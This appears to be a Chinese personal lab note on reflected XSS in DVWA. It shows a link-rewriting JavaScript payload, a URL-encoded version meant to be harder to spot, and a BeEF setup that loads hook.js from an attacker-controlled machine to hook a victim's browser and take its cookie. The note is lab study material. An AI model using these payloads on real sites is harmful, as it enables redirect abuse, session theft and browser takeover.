声明:
由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。
笔记内容来源于各类网课。
环境:
DVWA的XSS(Reflected)Low级别,Beef
一、概述
反射型XSS篡改网页链接。
二、JS代码实现篡改
我们有如下代码
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<h1>
<a href="http://www.baidu.com">测试</a>
</h1>
<p><a href="http://www.baidu.com">P标签</a></p>
<ul>
<li><a href="http://www.baidu.com">1</a></li>
<li><a href="http://www.baidu.com">2</a></li>
<li><a href="http://www.baidu.com">3</a></li>
<li>
<ol>
<li><a href="http://www.baidu.com">56</a></li>
<li><a href="http://www.baidu.com">78</a></li>
<li><a href="http://www.baidu.com">9</a></li>
</ol>
</li>
</ul>
</body>
</html>页面打开后,每个链接都指向百度,点击任意一个链接,都会跳转到百度。
我们加入如下js代码。
<script>
window.onload = function(){ // 在网页加载时执行该匿名函数
var link = document.getElementsByTagName("a"); // 查找所有的a标签
for(i=0;i<link.length;i++){ // 遍历所有a标签
link[i].href = "https://wenku.baidu.com/"; // 将每一个a标签的链接修改
}
}
</script>再次打开网页,我们的页面链接会被全部篡改为百度文库的首页。
这段JS代码就实现了网页中的链接篡改。
三、实验
3.1 篡改网页链接
审查元素,每一个a标签的链接都不一样。
我们使用刚才的js代码作为payload。由于php将+号解释为空格,所以我们需要将+替换为%2b。但是如果你是输入到输入框中,则不需要替换。
<script>window.onload = function(){var link = document.getElementsByTagName("a");for(i=0;i<link.length;i%2b%2b){link[i].href = "https://wenku.baidu.com/";}}</script>
可以看到,所有链接被篡改为百度文库首页。
同理转为URL编码,更不容易分辨,并且可以执行成功。这里转URL编码时,+需要变回来。
http://127.0.0.1:8007/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%7b%76%61%72%20%6c%69%6e%6b%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%66%6f%72%28%69%3d%30%3b%69%3c%6c%69%6e%6b%2e%6c%65%6e%67%74%68%3b%69%2b%2b%29%7b%6c%69%6e%6b%5b%69%5d%2e%68%72%65%66%20%3d%20%22%68%74%74%70%73%3a%2f%2f%77%65%6e%6b%75%2e%62%61%69%64%75%2e%63%6f%6d%2f%22%3b%7d%7d%3c%2f%73%63%72%69%70%74%3e
3.2 篡改恶意链接指向不良URL
刷流量,某些站点的重定向。
例如为某篇博客引流,只需将上面的payload的url替换掉即可。
3.3 篡改恶意链接指向恶意URL
使用Beef生成恶意链接,利用hook.js执行命令。
利用hook.js,需要在指令的URL的页面中包含上hook.js的即可。使用KailLinux演示。
开启beef。
sudo beef-xss
登陆beef管理页面。
我们将KaiLinux部署为服务器,在上面部署一个恶意页面。
开启apache服务。
apache可以正常使用。
我们编写一个index.html页面,在其中插入hook.js。然后构建一个恶意URL。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>:)</title>
</head>
<body>
<h1>
<a href="http://www.baidu.com">:)</a>
</h1>
<script src="http://192.168.3.72:3000/hook.js"></script>
</html>其中嵌入的hook.js的地址,使用虚拟机的地址。
我们从主机访问这个页面。虚拟机IP是192.168.3.72,主机的IP是192.168.3.95。
我们构建反射性XSS。
http://127.0.0.1:8007/vulnerabilities/xss_r/
?name=<script>window.onload = function(){var link = document.getElementsByTagName("a");for(i=0;i<link.length;i%2b%2b){link[i].href = "http://192.168.3.72/";}}</script>
成功替换了全部连接。我们点击一个连接。自动跳转恶意URL处。
查看beef。我们的主机已经上线。
我们执行一个getCookie操作,拿到当前的cookie。
除此之外还有其他各类操作。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
